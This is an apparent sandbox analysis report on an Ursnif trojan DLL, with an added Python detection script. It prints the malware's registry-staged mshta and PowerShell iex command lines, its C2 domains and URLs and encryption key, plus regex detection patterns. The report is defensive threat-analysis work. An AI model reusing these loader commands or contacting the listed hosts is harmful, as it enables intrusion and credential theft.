
Windows Analysis Report: data.dll

Overview

General Information

Sample Name: data.dll
Analysis ID: 498359
MD5: b0165e4e73dad2ac1cb519ea1eab8bd6
SHA1: 4ebb5db088d233d4c85b19b299613a240ce25c95
SHA256: 7ff6558fd39f6d8db53aa0baa3f3a9b1edb02ea2631102b6d85eafaf4bbd702b
Tags: dll

Detection

Ursnif
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
May check the online IP address of the machine
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6856 cmdline: loaddll32.exe 'C:\Users\user\Desktop\data.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 484 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1848 cmdline: rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4868 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 6508 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6616 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4500 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Father MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1444 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • control.exe (PID: 6988 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 3980 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 4812 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4588 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6836 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6316 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5528 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6200 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • RuntimeBroker.exe (PID: 3656 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 5008 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 1424 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 3512 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • RuntimeBroker.exe (PID: 4268 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4772 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 1260 cmdline: 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • mshta.exe (PID: 6692 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3740 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7024 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4504 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2088 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(list truncated; the full report lists 98 entries)

Unpacked PEs

Source | Rule | Description | Author
0.3.loaddll32.exe.10d8cd6.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
0.2.loaddll32.exe.dd0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.2.rundll32.exe.5d0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
0.2.loaddll32.exe.30a94a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
5.3.rundll32.exe.4f694a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(list truncated; the full report lists 19 entries)

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
Sigma detected: Mshta Spawning Windows Shell
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4588, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', ProcessId: 6836
Sigma detected: Suspicious Rundll32 Activity
Source: Process started; Author: juju4, Jonhnathan Ribeiro, oscd.community; Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6988, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 3980
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132780367479355110.4588.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
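
The process tree and the Sigma hits above describe a single registry-resident staging chain: mshta.exe evaluates script read from HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\DeviceFile, spawns powershell.exe, which IEX-es the ASCII-decoded UtilTool value of the same key, compiles C# from the user's Temp folder with csc.exe, and (via the injected explorer.exe) runs nslookup myip.opendns.com from cmd.exe. The Python below is an added example and is not part of the Joe Sandbox report or the text of the Sigma rules it names: it re-implements the gist of four of those detections over process-creation events constructed from this tree, and prints the ancestry chain of each hit, which is what a responder wants when the hit lands in explorer.exe's subtree. Assumptions: parent links follow the tree's nesting, the parent of mshta.exe is not in the sample (PPID 0), command-line quoting is simplified, the last event is a made-up benign PowerShell run, and the regexes are approximations written for this example rather than the published rule logic.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int        # 0 = parent not in the event sample (assumption for mshta.exe)
    image: str       # full path of the started process
    cmdline: str


# Constructed from the process tree of this report. Parent links follow the tree's
# nesting; quoting is simplified; the last event is a made-up benign run.
EVENTS = [
    ProcEvent(4812, 0, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);"
              r"eval(new ActiveXObject(Qod1).regread('HKCU\\Software\\AppDataLow\\Software\\Microsoft"
              r"\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\DeviceFile'));if(!window.flag)close()</script>"),
    ProcEvent(4588, 4812, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp "
              r"'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"),
    ProcEvent(6836, 4588, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"csc.exe /noconfig /fullpaths @C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline"),
    ProcEvent(3424, 4588, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(5008, 3424, r"C:\Windows\System32\cmd.exe",
              r"cmd /C nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1"),
    ProcEvent(1424, 5008, r"C:\Windows\System32\nslookup.exe",
              r"nslookup myip.opendns.com resolver1.opendns.com"),
    ProcEvent(9999, 0, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\inventory.ps1"),   # constructed benign event
]

# Labels for this example's four checks (not the Sigma rule titles verbatim).
MSHTA_SHELL = "mshta.exe spawning a Windows shell"
PS_FROM_REG = "powershell.exe running code read from the registry"
CSC_TEMP = "csc.exe compiling a source in the user's Temp folder"
EXT_IP = "external IP lookup via nslookup myip.opendns.com"

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
RE_IEX = re.compile(r"\b(iex|invoke-expression)\b", re.I)
# Get-ItemProperty (alias gp) with an HKCU:/HKLM: path before the closing paren.
RE_REG = re.compile(r"\b(gp|get-itemproperty(value)?)\b[^)]*\bhk(cu|lm):", re.I)
RE_TMP = re.compile(r"@.*\\appdata\\local\\temp\\", re.I)
RE_IP = re.compile(r"\bmyip\.opendns\.com\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (label, pid) for every event that matches one of the four checks."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name, parent = basename(e.image), by_pid.get(e.ppid)
        if parent and basename(parent.image) == "mshta.exe" and name in SHELLS:
            hits.append((MSHTA_SHELL, e.pid))
        if name in ("powershell.exe", "pwsh.exe") and RE_IEX.search(e.cmdline) and RE_REG.search(e.cmdline):
            hits.append((PS_FROM_REG, e.pid))
        if name == "csc.exe" and RE_TMP.search(e.cmdline):
            hits.append((CSC_TEMP, e.pid))
        if name == "nslookup.exe" and RE_IP.search(e.cmdline):
            hits.append((EXT_IP, e.pid))
    return hits


def lineage(events, pid):
    """Image names from the outermost known ancestor down to pid (cycle-safe)."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


if __name__ == "__main__":
    for label, pid in detect(EVENTS):
        print(f"{label}: pid {pid}, chain {' > '.join(lineage(EVENTS, pid))}")
```

The parent check is the one that survives obfuscation: the registry value names and the GUID key change per build, but mshta.exe handing a process to powershell.exe, and csc.exe being fed a .cmdline file under Temp, do not.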

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/lbK; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/; Avira URL Cloud: Label: malware
